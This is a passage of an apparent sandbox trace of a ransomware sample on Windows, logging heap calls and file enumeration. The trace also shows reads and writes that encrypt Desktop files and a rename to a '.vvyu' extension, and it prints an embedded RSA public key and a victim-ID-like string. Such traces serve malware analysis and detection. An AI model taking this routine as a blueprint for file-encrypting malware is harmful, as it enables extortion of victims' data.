(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9a0 [0188.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2800 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.637] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x11ed3, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11ed3, lpOverlapped=0x0) returned 1 [0188.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.639] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11ed8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.639] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.640] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.641] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.641] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.641] CloseHandle (hObject=0x584) returned 1 [0188.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0188.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.643] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\uvnwCx.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\uvnwcx.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\uvnwCx.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\uvnwcx.jpg.vvyu")) returned 1 [0188.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.645] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.649] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834cce50, ftCreationTime.dwHighDateTime=0x1d89e2f, ftLastAccessTime.dwLowDateTime=0xf0a97c20, ftLastAccessTime.dwHighDateTime=0x1d8a0df, ftLastWriteTime.dwLowDateTime=0xf0a97c20, ftLastWriteTime.dwHighDateTime=0x1d8a0df, nFileSizeHigh=0x0, nFileSizeLow=0x10ac9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xnJF1rqEtdtxtC.mkv", cAlternateFileName="XNJF1R~1.MKV")) returned 1 [0188.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2800 [0188.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2800 | out: hHeap=0x2c0000) returned 1 [0188.650] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\xnJF1rqEtdtxtC.mkv") returned=".mkv" [0188.650] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xnJF1rqEtdtxtC.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\xnjf1rqetdtxtc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.650] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=68297) returned 1 [0188.650] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.654] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10aa3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.654] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.658] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.658] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10ac9, lpOverlapped=0x0) returned 1 [0188.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.659] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.661] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.661] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.661] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.661] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.661] GetLastError () returned 0x0 [0188.662] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.662] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.662] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.662] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.662] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10ad0) returned 0x2af5168 [0188.663] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2800 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2848 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9d0 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.664] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d9b8 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.666] HeapFree (in: hHeap=0x2c0000, 